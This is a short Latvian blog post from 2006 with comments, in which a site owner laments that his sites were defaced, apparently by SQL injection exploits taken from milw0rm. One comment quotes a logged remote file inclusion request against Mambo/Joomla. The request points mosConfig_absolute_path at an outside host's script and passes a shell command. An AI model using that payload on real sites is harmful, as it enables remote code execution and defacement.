MaKo
Bēda 
4.-Mar-2006 01:20 pm
Script kiddy neliek mieru joprojām :( Pagāšnakt gan mako.sauc.lv, gan vesture sauc.lv piedirsuši ar http://milw0rm.com/ exploitu palīdzību. Standarta SQL injection, cik varu spriest. Rokas nolaižas un nezinu, kā sevi motivēt tālāk ar šiem bezmaksas projektiem strādāt.
Comments 
8.-Mar-2006 10:16 am
rodas sajuuta ka vereetu buut ka tu taaa ari neko neatradiisi...

http://r21vo.id.lv/?cat=blog&id=223&sk=0


Tā kā es sekoju līdzi trafikam uz lapu, tad jau kādu laiciņu parādās interesanti ieraksti ar aptuveni šādu pieprasījumu:
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid ]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/

Pagūglējot, manīju ka mainīgie ar tādiem nosaukumiem un līdzīgos virknējumos tiek izmantoti lapās kuras izmanto Mambo CMS (tagad saucas Joomla). Varētu padomāt ka šams ir caurs..

Ja nopietni, tad mušas runā, ka tas trafiks nāk no "Defacing Tool 2.0 by r3v3ng4ns".
8.-Mar-2006 10:37 am
Es tak saku - script kiddy.
Joomlai nupat jauna versija iznaaca, kur esot iepriekšējo caurumi aizlāpīti.
8.-Mar-2006 06:49 pm
njee es akal sapratu ka tas ir kauakads bots kasshance neatkariigi no cilveeka TB nevis scriptkidy bet vienkaarshi bots ;( un ko tad atradiisi....
This page was loaded Nov 3. 2024, 2:09 pm GMT.